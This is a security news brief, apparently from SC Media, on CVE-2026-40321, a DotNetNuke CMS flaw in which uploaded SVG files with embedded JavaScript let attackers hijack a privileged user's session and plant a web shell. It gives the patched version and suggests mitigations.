A cross-site scripting (XSS) vulnerability (CVE-2026-40321, CVSS 8.0 HIGH) in DotNetNuke CMS allows authenticated attackers to upload malicious SVG files; when a privileged user views the file, embedded JavaScript executes, enabling session hijacking and web shell deployment for server compromise. The flaw affects DNNSoftware DotNetNuke versions prior to 10.2.2. Administrators must upgrade to version 10.2.2 and should also review user registration policies and disable anonymous file uploads if not required.
Vulnerability Management , Patch/Configuration Management DotNetNuke CMS vulnerability allows server compromise via malicious SVG uploads April 30, 2026 Share By SC Staff (Adobe Stock) As reported by Tech Radar, a cross-site scripting (XSS) vulnerability in the DotNetNuke CMS allows cybercriminals to chain exploits and gain control of web servers. The flaw, CVE-2026-40321, affects the popular open-source platform built on Microsoft technology. Attackers can upload a malicious SVG file containing JavaScript code as an image, according to Pentest Tools. When a privileged user clicks on this file, the embedded payload executes, triggering XSS and writing a backdoor file directly onto the server. This allows attackers to act using the victim's authenticated session and exploit an authenticated endpoint to write a new web shell. This vulnerability bypasses traditional security defenses like antivirus and firewalls, as the attack uses legitimate file types and standard HTTP traffic. While a patch exists, administrators should also review user registration policies and disable anonymous file uploads if not necessary. The attack requires a registered account, SVG upload capability, and a privileged user clicking a malicious attachment. Source: Tech Radar SC Staff Related Vulnerability Management Critical cPanel vulnerability actively exploited in the wild SC Staff April 30, 2026 The vulnerability stems from a Carriage Return Line Feed (CRLF) injection flaw within the login and session loading processes of cPanel & WHM. Vulnerability Management CISA adds ConnectWise, Microsoft flaws to KEV catalog Laura French April 30, 2026 The Windows flaw stems from an incomplete patch of a vulnerability exploited by APT28. Vulnerability Management GitHub vulnerability CVE-2026-3854 allows code execution with a single git push SC Staff April 29, 2026 The vulnerability, CVE-2026-3854, arises from improper handling of special elements within GitHub Enterprise Server. Get daily email updates SC Media's daily must-read of the most current and pressing daily news Business Email By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy . Subscribe Related Terms Bug Buffer Overflow Disassembly You can skip this ad in 5 seconds